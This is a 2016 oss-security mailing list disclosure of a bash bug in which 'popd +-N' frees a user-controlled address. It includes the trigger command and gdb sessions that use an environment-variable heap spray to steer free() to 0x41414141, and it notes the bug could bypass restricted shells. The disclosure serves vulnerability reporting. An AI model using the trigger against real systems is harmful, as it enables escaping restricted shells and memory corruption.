Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 17 Nov 2016 12:04:49 -0500
From: Fernando Muñoz <fernando@...l-life.com>
To: oss-security@...ts.openwall.com
Cc: Chester Ramey <chet.ramey@...e.edu>
Subject: bash - popd controlled free

bash - popd controlled free
====================

popd can be tricked to free a user supplied address in the following way:

$ popd +-111111

This could be used to bypass restricted shells (rsh) on some
environments to cause use-after-free.

This was already reported to bash devs and only considered a bug, if
Mitre consider it could have a security impact, please assign a CVE.

Details
======
$ gdb bash
...
(gdb) r -c 'popd +-67372036'
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bashinstrumentado/bash-4.3/bash -c 'popd +-67372036'

Program received signal SIGSEGV, Segmentation fault.
0x0827f93a in popd_builtin (list=<optimized out>) at ./pushd.def:384
384          free (pushd_directory_list[i]);
(gdb) print pushd_directory_list[i]
Cannot access memory at address 0x10101010

----
$ export AA=`perl -e 'print "A"x100000'`
$ gdb ./bash
...
(gdb) x/s *((char **)environ+13)
0xbffe75d4:    "AA=", 'A' <repeats 197 times>...
(gdb) run -c 'popd +-805281142'
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/bash/bash-4.3/bash -c 'popd +-805281142'

Program received signal SIGSEGV, Segmentation fault.
internal_free (mem=0x41414141, file=0x83fb36c "./pushd.def", line=384,
flags=<optimized out>) at malloc.c:863
863      if (p->mh_alloc == ISMEMALIGN)


- Fernando

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ